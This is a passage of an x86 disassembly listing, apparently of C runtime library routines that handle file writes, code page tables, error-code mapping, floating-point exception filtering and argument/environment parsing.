; ---------------------------------------------------------------------------
loc_41F158: ; CODE XREF: sub_41F033+E0�j
call GetLastError
mov [ebp+arg_0], eax
jmp short loc_41F12A
; ---------------------------------------------------------------------------
loc_41F163: ; CODE XREF: sub_41F033+69�j
lea ecx, [ebp+NumberOfBytesWritten]
push edi ; lpOverlapped
push ecx ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push dword ptr [eax] ; hFile
call WriteFile ; WriteFile
test eax, eax
jz short loc_41F185
mov eax, [ebp+NumberOfBytesWritten]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41F12C
; ---------------------------------------------------------------------------
loc_41F185: ; CODE XREF: sub_41F033+145�j
call GetLastError
mov [ebp+arg_0], eax
jmp short loc_41F12C
; ---------------------------------------------------------------------------
loc_41F190: ; CODE XREF: sub_41F033+10F�j
push [ebp+arg_0]
call sub_41F64A
pop ecx
jmp short loc_41F1D8
; ---------------------------------------------------------------------------
loc_41F19B: ; CODE XREF: sub_41F033+7B�j
; sub_41F033+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41F1B0
mov eax, [ebp+lpBuffer]
cmp byte ptr [eax], 1Ah
jz loc_41F07D
loc_41F1B0: ; CODE XREF: sub_41F033+16F�j
mov dword ptr byte_445EDC+0D43E4h, 1Ch
mov dword ptr byte_445EDC+0D43E8h, edi
jmp short loc_41F1D8
; ---------------------------------------------------------------------------
loc_41F1C2: ; CODE XREF: sub_41F033+FE�j
sub eax, [ebp+var_10]
jmp short loc_41F1DB
; ---------------------------------------------------------------------------
loc_41F1C7: ; CODE XREF: sub_41F033+15�j
; sub_41F033+37�j
and dword ptr byte_445EDC+0D43E8h, 0
mov dword ptr byte_445EDC+0D43E4h, 9
loc_41F1D8: ; CODE XREF: sub_41F033+120�j
; sub_41F033+166�j ...
or eax, 0FFFFFFFFh
loc_41F1DB: ; CODE XREF: sub_41F033+4C�j
; sub_41F033+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F033 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F1E0 proc near ; CODE XREF: sub_41F5A4+B�p
CPInfo = _cpinfo ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41F379
mov esi, eax
pop ecx
cmp esi, dword ptr byte_445EDC+0D56E8h
mov [ebp+arg_0], esi
jz loc_41F36D
xor ebx, ebx
cmp esi, ebx
jz loc_41F363
xor edx, edx
mov eax, 4400D8h
loc_41F214: ; CODE XREF: sub_41F1E0+41�j
cmp [eax], esi
jz short loc_41F28A
add eax, 30h
inc edx
cmp eax, 4401C8h
jl short loc_41F214
lea eax, [ebp+CPInfo]
push eax ; lpCPInfo
push esi ; CodePage
call GetCPInfo ; GetCPInfo
cmp eax, 1
jnz loc_41F35B
push 40h
xor eax, eax
pop ecx
mov edi, 51B6E0h
cmp [ebp+CPInfo.MaxCharSize], 1
mov dword ptr byte_445EDC+0D56E8h, esi
rep stosd
stosb
mov dword ptr byte_445EDC+0D5908h, ebx
jbe loc_41F349
cmp [ebp+CPInfo.LeadByte], 0
jz loc_41F31F
lea ecx, [ebp+CPInfo.LeadByte+1]
loc_41F267: ; CODE XREF: sub_41F1E0+139�j
mov dl, [ecx]
test dl, dl
jz loc_41F31F
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41F278: ; CODE XREF: sub_41F1E0+A8�j
cmp eax, edx
ja loc_41F313
or byte ptr [eax+51B6E1h], 4
inc eax
jmp short loc_41F278
; ---------------------------------------------------------------------------
loc_41F28A: ; CODE XREF: sub_41F1E0+36�j
push 40h
xor eax, eax
pop ecx
mov edi, 51B6E0h
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, [esi+4400E8h]
loc_41F2A6: ; CODE XREF: sub_41F1E0+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41F2D9
loc_41F2AD: ; CODE XREF: sub_41F1E0+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41F2D9
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41F2D2
mov edx, [ebp+var_4]
mov dl, [edx+4400D0h]
loc_41F2C7: ; CODE XREF: sub_41F1E0+F0�j
or [eax+51B6E1h], dl
inc eax
cmp eax, edi
jbe short loc_41F2C7
loc_41F2D2: ; CODE XREF: sub_41F1E0+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41F2AD
loc_41F2D9: ; CODE XREF: sub_41F1E0+CB�j
; sub_41F1E0+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41F2A6
mov eax, [ebp+arg_0]
mov dword ptr byte_445EDC+0D5700h, 1
push eax
mov dword ptr byte_445EDC+0D56E8h, eax
call sub_41F3C3
lea esi, [esi+4400DCh]
mov edi, 51B5D0h
movsd
movsd
pop ecx
mov dword ptr byte_445EDC+0D5908h, eax
movsd
jmp short loc_41F368
; ---------------------------------------------------------------------------
loc_41F313: ; CODE XREF: sub_41F1E0+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41F267
loc_41F31F: ; CODE XREF: sub_41F1E0+7E�j
; sub_41F1E0+8B�j
push 1
pop eax
loc_41F322: ; CODE XREF: sub_41F1E0+14F�j
or byte ptr [eax+51B6E1h], 8
inc eax
cmp eax, 0FFh
jb short loc_41F322
push esi
call sub_41F3C3
pop ecx
mov dword ptr byte_445EDC+0D5908h, eax
mov dword ptr byte_445EDC+0D5700h, 1
jmp short loc_41F34F
; ---------------------------------------------------------------------------
loc_41F349: ; CODE XREF: sub_41F1E0+74�j
mov dword ptr byte_445EDC+0D5700h, ebx
loc_41F34F: ; CODE XREF: sub_41F1E0+167�j
xor eax, eax
mov edi, 51B5D0h
stosd
stosd
stosd
jmp short loc_41F368
; ---------------------------------------------------------------------------
loc_41F35B: ; CODE XREF: sub_41F1E0+51�j
cmp dword ptr byte_445EDC+0D448Ch, ebx
jz short loc_41F371
loc_41F363: ; CODE XREF: sub_41F1E0+27�j
call sub_41F3F6
loc_41F368: ; CODE XREF: sub_41F1E0+131�j
; sub_41F1E0+179�j
call sub_41F41F
loc_41F36D: ; CODE XREF: sub_41F1E0+1D�j
xor eax, eax
jmp short loc_41F374
; ---------------------------------------------------------------------------
loc_41F371: ; CODE XREF: sub_41F1E0+181�j
or eax, 0FFFFFFFFh
loc_41F374: ; CODE XREF: sub_41F1E0+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F1E0 endp
; =============== S U B R O U T I N E =======================================
sub_41F379 proc near ; CODE XREF: sub_41F1E0+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr byte_445EDC+0D448Ch, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41F399
mov dword ptr byte_445EDC+0D448Ch, 1
jmp GetOEMCP
; ---------------------------------------------------------------------------
loc_41F399: ; CODE XREF: sub_41F379+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41F3AE
mov dword ptr byte_445EDC+0D448Ch, 1
jmp GetACP
; ---------------------------------------------------------------------------
loc_41F3AE: ; CODE XREF: sub_41F379+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41F3C2
mov eax, dword ptr byte_445EDC+0D4484h
mov dword ptr byte_445EDC+0D448Ch, 1
locret_41F3C2: ; CODE XREF: sub_41F379+38�j
retn
sub_41F379 endp
; =============== S U B R O U T I N E =======================================
sub_41F3C3 proc near ; CODE XREF: sub_41F1E0+118�p
; sub_41F1E0+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41F3F0
sub eax, 4
jz short loc_41F3EA
sub eax, 0Dh
jz short loc_41F3E4
dec eax
jz short loc_41F3DE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41F3DE: ; CODE XREF: sub_41F3C3+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41F3E4: ; CODE XREF: sub_41F3C3+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41F3EA: ; CODE XREF: sub_41F3C3+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41F3F0: ; CODE XREF: sub_41F3C3+9�j
mov eax, 411h
retn
sub_41F3C3 endp
; =============== S U B R O U T I N E =======================================
sub_41F3F6 proc near ; CODE XREF: sub_41F1E0:loc_41F363�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, 51B6E0h
rep stosd
stosb
xor eax, eax
mov edi, 51B5D0h
mov dword ptr byte_445EDC+0D56E8h, eax
mov dword ptr byte_445EDC+0D5700h, eax
mov dword ptr byte_445EDC+0D5908h, eax
stosd
stosd
stosd
pop edi
retn
sub_41F3F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F41F proc near ; CODE XREF: sub_41F1E0:loc_41F368�p
CharType = word ptr -514h
var_314 = byte ptr -314h
DestStr = byte ptr -214h
MultiByteStr = byte ptr -114h
CPInfo = _cpinfo ptr -14h
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+CPInfo]
push esi
push eax ; lpCPInfo
push dword ptr byte_445EDC+0D56E8h ; CodePage
call GetCPInfo ; GetCPInfo
cmp eax, 1
jnz loc_41F558
xor eax, eax
mov esi, 100h
loc_41F449: ; CODE XREF: sub_41F41F+34�j
mov [ebp+eax+MultiByteStr], al
inc eax
cmp eax, esi
jb short loc_41F449
mov al, [ebp+CPInfo.LeadByte]
mov [ebp+MultiByteStr], 20h
test al, al
jz short loc_41F49A
push ebx
push edi
lea edx, [ebp+CPInfo.LeadByte+1]
loc_41F468: ; CODE XREF: sub_41F41F+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41F48F
sub ecx, eax
lea edi, [ebp+eax+MultiByteStr]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41F48F: ; CODE XREF: sub_41F41F+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41F468
pop edi
pop ebx
loc_41F49A: ; CODE XREF: sub_41F41F+42�j
push 0 ; int
lea eax, [ebp+CharType]
push dword ptr byte_445EDC+0D5908h ; Locale
push dword ptr byte_445EDC+0D56E8h ; CodePage
push eax ; lpCharType
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_420187
push 0 ; int
lea eax, [ebp+DestStr]
push dword ptr byte_445EDC+0D56E8h ; CodePage
push esi ; cchDest
push eax ; lpDestStr
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push esi ; dwMapFlags
push dword ptr byte_445EDC+0D5908h ; Locale
call sub_41EE0F
push 0 ; int
lea eax, [ebp+var_314]
push dword ptr byte_445EDC+0D56E8h ; CodePage
push esi ; cchDest
push eax ; lpDestStr
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 200h ; dwMapFlags
push dword ptr byte_445EDC+0D5908h ; Locale
call sub_41EE0F
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+CharType]
loc_41F515: ; CODE XREF: sub_41F41F+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41F533
or byte ptr [eax+51B6E1h], 10h
mov dl, [ebp+eax+DestStr]
loc_41F52B: ; CODE XREF: sub_41F41F+127�j
mov [eax+51B5E0h], dl
jmp short loc_41F54F
; ---------------------------------------------------------------------------
loc_41F533: ; CODE XREF: sub_41F41F+FC�j
test dl, 2
jz short loc_41F548
or byte ptr [eax+51B6E1h], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41F52B
; ---------------------------------------------------------------------------
loc_41F548: ; CODE XREF: sub_41F41F+117�j
and byte ptr [eax+51B5E0h], 0
loc_41F54F: ; CODE XREF: sub_41F41F+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41F515
jmp short loc_41F5A1
; ---------------------------------------------------------------------------
loc_41F558: ; CODE XREF: sub_41F41F+1D�j
xor eax, eax
mov esi, 100h
loc_41F55F: ; CODE XREF: sub_41F41F+180�j
cmp eax, 41h
jb short loc_41F57D
cmp eax, 5Ah
ja short loc_41F57D
or byte ptr [eax+51B6E1h], 10h
mov cl, al
add cl, 20h
loc_41F575: ; CODE XREF: sub_41F41F+174�j
mov [eax+51B5E0h], cl
jmp short loc_41F59C
; ---------------------------------------------------------------------------
loc_41F57D: ; CODE XREF: sub_41F41F+143�j
; sub_41F41F+148�j
cmp eax, 61h
jb short loc_41F595
cmp eax, 7Ah
ja short loc_41F595
or byte ptr [eax+51B6E1h], 20h
mov cl, al
sub cl, 20h
jmp short loc_41F575
; ---------------------------------------------------------------------------
loc_41F595: ; CODE XREF: sub_41F41F+161�j
; sub_41F41F+166�j
and byte ptr [eax+51B5E0h], 0
loc_41F59C: ; CODE XREF: sub_41F41F+15C�j
inc eax
cmp eax, esi
jb short loc_41F55F
loc_41F5A1: ; CODE XREF: sub_41F41F+137�j
pop esi
leave
retn
sub_41F41F endp
; =============== S U B R O U T I N E =======================================
sub_41F5A4 proc near ; CODE XREF: sub_41F8FF+9�p
; sub_41F957+D�p ...
cmp dword ptr byte_445EDC+0D5A54h, 0
jnz short locret_41F5BF
push 0FFFFFFFDh
call sub_41F1E0
pop ecx
mov dword ptr byte_445EDC+0D5A54h, 1
locret_41F5BF: ; CODE XREF: sub_41F5A4+7�j
retn
sub_41F5A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5C0 proc near ; CODE XREF: sub_419B08+2B�p
; sub_419B08+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword ptr byte_445EDC+0D5700h, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41F5E4
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_419300
add esp, 0Ch
jmp short loc_41F647
; ---------------------------------------------------------------------------
loc_41F5E4: ; CODE XREF: sub_41F5C0+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41F629
mov ecx, [ebp+arg_4]
loc_41F5EF: ; CODE XREF: sub_41F5C0+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test byte ptr [esi+51B6E1h], 4
mov [edi], al
jz short loc_41F613
inc edi
inc ecx
test edx, edx
jz short loc_41F61F
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41F625
jmp short loc_41F619
; ---------------------------------------------------------------------------
loc_41F613: ; CODE XREF: sub_41F5C0+3E�j
inc edi
inc ecx
test al, al
jz short loc_41F629
loc_41F619: ; CODE XREF: sub_41F5C0+51�j
test edx, edx
jnz short loc_41F5EF
jmp short loc_41F629
; ---------------------------------------------------------------------------
loc_41F61F: ; CODE XREF: sub_41F5C0+44�j
and byte ptr [edi-1], 0
jmp short loc_41F629
; ---------------------------------------------------------------------------
loc_41F625: ; CODE XREF: sub_41F5C0+4F�j
and byte ptr [edi-2], 0
loc_41F629: ; CODE XREF: sub_41F5C0+2A�j
; sub_41F5C0+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41F644
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41F644: ; CODE XREF: sub_41F5C0+6F�j
mov eax, [ebp+arg_0]
loc_41F647: ; CODE XREF: sub_41F5C0+22�j
pop edi
pop ebp
retn
sub_41F5C0 endp
; =============== S U B R O U T I N E =======================================
sub_41F64A proc near ; CODE XREF: sub_419F3F+16�p
; sub_41A30A+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword ptr byte_445EDC+0D43E8h, ecx
mov eax, 4401C8h
loc_41F65B: ; CODE XREF: sub_41F64A+1E�j
cmp ecx, [eax]
jz short loc_41F67F
add eax, 8
inc edx
cmp eax, 440330h
jl short loc_41F65B
cmp ecx, 13h
jb short loc_41F68C
cmp ecx, 24h
ja short loc_41F68C
mov dword ptr byte_445EDC+0D43E4h, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41F67F: ; CODE XREF: sub_41F64A+13�j
mov eax, dword ptr unk_4401CC[edx*8]
mov dword ptr byte_445EDC+0D43E4h, eax
retn
; ---------------------------------------------------------------------------
loc_41F68C: ; CODE XREF: sub_41F64A+23�j
; sub_41F64A+28�j
cmp ecx, 0BCh
jb short loc_41F6A6
cmp ecx, 0CAh
mov dword ptr byte_445EDC+0D43E4h, 8
jbe short locret_41F6B0
loc_41F6A6: ; CODE XREF: sub_41F64A+48�j
mov dword ptr byte_445EDC+0D43E4h, 16h
locret_41F6B0: ; CODE XREF: sub_41F64A+5A�j
retn
sub_41F64A endp
; =============== S U B R O U T I N E =======================================
sub_41F6B1 proc near ; CODE XREF: sub_41A334+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_420040
test eax, eax
pop ecx
jz short loc_41F73A
cmp esi, 440468h
jnz short loc_41F6CF
xor eax, eax
jmp short loc_41F6DA
; ---------------------------------------------------------------------------
loc_41F6CF: ; CODE XREF: sub_41F6B1+18�j
cmp esi, 440488h
jnz short loc_41F73A
push 1
pop eax
loc_41F6DA: ; CODE XREF: sub_41F6B1+1C�j
inc dword ptr byte_445EDC+0D45A8h
test word ptr [esi+0Ch], 10Ch
jnz short loc_41F73A
cmp dword ptr byte_445EDC+0D4490h[eax*4], 0
push ebx
push edi
lea edi, ds:51A36Ch[eax*4]
mov ebx, 1000h
jnz short loc_41F720
push ebx
call sub_418175
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41F720
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41F72D
; ---------------------------------------------------------------------------
loc_41F720: ; CODE XREF: sub_41F6B1+4D�j
; sub_41F6B1+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_41F72D: ; CODE XREF: sub_41F6B1+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F73A: ; CODE XREF: sub_41F6B1+10�j
; sub_41F6B1+24�j ...
xor eax, eax
pop esi
retn
sub_41F6B1 endp
; =============== S U B R O U T I N E =======================================
sub_41F73E proc near ; CODE XREF: sub_41A334+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_41F768
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41F779
push esi
call sub_41E57F
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F768: ; CODE XREF: sub_41F73E+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_41F779
push eax
call sub_41E57F
pop ecx
loc_41F779: ; CODE XREF: sub_41F73E+10�j
; sub_41F73E+32�j
pop esi
retn
sub_41F73E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41F77B(int, struct _EXCEPTION_POINTERS *ExceptionInfo)
sub_41F77B proc near ; CODE XREF: .text:0041A449�p
arg_0 = dword ptr 8
ExceptionInfo = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_41F8BC
test eax, eax
pop ecx
jz loc_41F8B0
mov ebx, [eax+8]
test ebx, ebx
jz loc_41F8B0
cmp ebx, 5
jnz short loc_41F7AC
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41F8B9
; ---------------------------------------------------------------------------
loc_41F7AC: ; CODE XREF: sub_41F77B+23�j
cmp ebx, 1
jz loc_41F8AB
mov ecx, dword ptr byte_445EDC+0D4498h
mov [ebp+arg_0], ecx
mov ecx, [ebp+ExceptionInfo]
mov dword ptr byte_445EDC+0D4498h, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41F89B
mov ecx, dword ptr unk_4403A8
mov edx, dword ptr unk_4403AC
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41F7FB
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:440338h[esi*4]
loc_41F7F2: ; CODE XREF: sub_41F77B+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41F7F2
loc_41F7FB: ; CODE XREF: sub_41F77B+69�j
mov eax, [eax]
mov esi, dword ptr unk_4403B4
cmp eax, 0C000008Eh
jnz short loc_41F816
mov dword ptr unk_4403B4, 83h
jmp short loc_41F886
; ---------------------------------------------------------------------------
loc_41F816: ; CODE XREF: sub_41F77B+8D�j
cmp eax, 0C0000090h
jnz short loc_41F829
mov dword ptr unk_4403B4, 81h
jmp short loc_41F886
; ---------------------------------------------------------------------------
loc_41F829: ; CODE XREF: sub_41F77B+A0�j
cmp eax, 0C0000091h
jnz short loc_41F83C
mov dword ptr unk_4403B4, 84h
jmp short loc_41F886
; ---------------------------------------------------------------------------
loc_41F83C: ; CODE XREF: sub_41F77B+B3�j
cmp eax, 0C0000093h
jnz short loc_41F84F
mov dword ptr unk_4403B4, 85h
jmp short loc_41F886
; ---------------------------------------------------------------------------
loc_41F84F: ; CODE XREF: sub_41F77B+C6�j
cmp eax, 0C000008Dh
jnz short loc_41F862
mov dword ptr unk_4403B4, 82h
jmp short loc_41F886
; ---------------------------------------------------------------------------
loc_41F862: ; CODE XREF: sub_41F77B+D9�j
cmp eax, 0C000008Fh
jnz short loc_41F875
mov dword ptr unk_4403B4, 86h
jmp short loc_41F886
; ---------------------------------------------------------------------------
loc_41F875: ; CODE XREF: sub_41F77B+EC�j
cmp eax, 0C0000092h
jnz short loc_41F886
mov dword ptr unk_4403B4, 8Ah
loc_41F886: ; CODE XREF: sub_41F77B+99�j
; sub_41F77B+AC�j ...
push dword ptr unk_4403B4
push 8
call ebx
pop ecx
mov dword ptr unk_4403B4, esi
pop ecx
pop esi
jmp short loc_41F8A3
; ---------------------------------------------------------------------------
loc_41F89B: ; CODE XREF: sub_41F77B+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41F8A3: ; CODE XREF: sub_41F77B+11E�j
mov eax, [ebp+arg_0]
mov dword ptr byte_445EDC+0D4498h, eax
loc_41F8AB: ; CODE XREF: sub_41F77B+34�j
or eax, 0FFFFFFFFh
jmp short loc_41F8B9
; ---------------------------------------------------------------------------
loc_41F8B0: ; CODE XREF: sub_41F77B+F�j
; sub_41F77B+1A�j
push [ebp+ExceptionInfo] ; ExceptionInfo
call UnhandledExceptionFilter ; UnhandledExceptionFilter
loc_41F8B9: ; CODE XREF: sub_41F77B+2C�j
; sub_41F77B+133�j
pop ebx
pop ebp
retn
sub_41F77B endp
; =============== S U B R O U T I N E =======================================
sub_41F8BC proc near ; CODE XREF: sub_41F77B+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword ptr unk_4403B0
cmp dword ptr unk_440330, edx
push esi
mov eax, 440330h
jz short loc_41F8E9
lea esi, [ecx+ecx*2]
lea esi, ds:440330h[esi*4]
loc_41F8DE: ; CODE XREF: sub_41F8BC+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41F8E9
cmp [eax], edx
jnz short loc_41F8DE
loc_41F8E9: ; CODE XREF: sub_41F8BC+16�j
; sub_41F8BC+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:440330h[ecx*4]
cmp eax, ecx
jnb short loc_41F8FC
cmp [eax], edx
jz short locret_41F8FE
loc_41F8FC: ; CODE XREF: sub_41F8BC+3A�j
xor eax, eax
locret_41F8FE: ; CODE XREF: sub_41F8BC+3E�j
retn
sub_41F8BC endp
; =============== S U B R O U T I N E =======================================
sub_41F8FF proc near ; CODE XREF: .text:0041A40B�p
cmp dword ptr byte_445EDC+0D5A54h, 0
jnz short loc_41F90D
call sub_41F5A4
loc_41F90D: ; CODE XREF: sub_41F8FF+7�j
push esi
mov esi, dword ptr byte_445EDC+0D5A4Ch
mov al, [esi]
cmp al, 22h
jnz short loc_41F93F
loc_41F91A: ; CODE XREF: sub_41F8FF+33�j
; sub_41F8FF+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41F937
test al, al
jz short loc_41F937
movzx eax, al
push eax
call sub_42163F
test eax, eax
pop ecx
jz short loc_41F91A
inc esi
jmp short loc_41F91A
; ---------------------------------------------------------------------------
loc_41F937: ; CODE XREF: sub_41F8FF+21�j
; sub_41F8FF+25�j
cmp byte ptr [esi], 22h
jnz short loc_41F949
loc_41F93C: ; CODE XREF: sub_41F8FF+52�j
inc esi
jmp short loc_41F949
; ---------------------------------------------------------------------------
loc_41F93F: ; CODE XREF: sub_41F8FF+19�j
cmp al, 20h
jbe short loc_41F949
loc_41F943: ; CODE XREF: sub_41F8FF+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41F943
loc_41F949: ; CODE XREF: sub_41F8FF+3B�j
; sub_41F8FF+3E�j ...
mov al, [esi]
test al, al
jz short loc_41F953
cmp al, 20h
jbe short loc_41F93C
loc_41F953: ; CODE XREF: sub_41F8FF+4E�j
mov eax, esi
pop esi
retn
sub_41F8FF endp
; =============== S U B R O U T I N E =======================================
sub_41F957 proc near ; CODE XREF: .text:0041A3F4�p
push ebx
xor ebx, ebx
cmp dword ptr byte_445EDC+0D5A54h, ebx
push esi
push edi
jnz short loc_41F969
call sub_41F5A4
loc_41F969: ; CODE XREF: sub_41F957+B�j
mov esi, dword ptr byte_445EDC+0D4430h
xor edi, edi
loc_41F971: ; CODE XREF: sub_41F957+30�j
mov al, [esi]
cmp al, bl
jz short loc_41F989
cmp al, 3Dh
jz short loc_41F97C
inc edi
loc_41F97C: ; CODE XREF: sub_41F957+22�j
push esi
call sub_4180D0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41F971
; ---------------------------------------------------------------------------
loc_41F989: ; CODE XREF: sub_41F957+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_418175
mov esi, eax
pop ecx
cmp esi, ebx
mov dword ptr byte_445EDC+0D440Ch, esi
jnz short loc_41F9AB
push 9 ; NumberOfBytesWritten
call sub_41A45C
pop ecx
loc_41F9AB: ; CODE XREF: sub_41F957+4A�j
mov edi, dword ptr byte_445EDC+0D4430h
cmp [edi], bl
jz short loc_41F9EE
push ebp
loc_41F9B6: ; CODE XREF: sub_41F957+94�j
push edi
call sub_4180D0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41F9E7
push ebp
call sub_418175
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41F9DA
push 9 ; NumberOfBytesWritten
call sub_41A45C
pop ecx
loc_41F9DA: ; CODE XREF: sub_41F957+79�j
push edi
push dword ptr [esi]
call sub_417FE0
pop ecx
add esi, 4
pop ecx
loc_41F9E7: ; CODE XREF: sub_41F957+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_41F9B6
pop ebp
loc_41F9EE: ; CODE XREF: sub_41F957+5C�j
push dword ptr byte_445EDC+0D4430h ; lpMem
call sub_418227
pop ecx
mov dword ptr byte_445EDC+0D4430h, ebx
mov [esi], ebx
pop edi
pop esi
mov dword ptr byte_445EDC+0D5A50h, 1
pop ebx
retn
sub_41F957 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA10 proc near ; CODE XREF: .text:0041A3EF�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword ptr byte_445EDC+0D5A54h, ebx
push esi
push edi
jnz short loc_41FA27
call sub_41F5A4
loc_41FA27: ; CODE XREF: sub_41FA10+10�j
mov esi, 51A378h
push 104h
push esi
push ebx
call dword ptr byte_424084+4
mov eax, dword ptr byte_445EDC+0D5A4Ch
mov dword ptr byte_445EDC+0D441Ch, esi
mov edi, esi
cmp [eax], bl
jz short loc_41FA4C
mov edi, eax
loc_41FA4C: ; CODE XREF: sub_41FA10+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_41FAA9
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_418175
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41FA7C
push 8 ; NumberOfBytesWritten
call sub_41A45C
pop ecx
loc_41FA7C: ; CODE XREF: sub_41FA10+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41FAA9
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword ptr byte_445EDC+0D4404h, esi
pop edi
pop esi
mov dword ptr byte_445EDC+0D4400h, eax
pop ebx
leave
retn
sub_41FA10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FAA9 proc near ; CODE XREF: sub_41FA10+47�p
; sub_41FA10+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
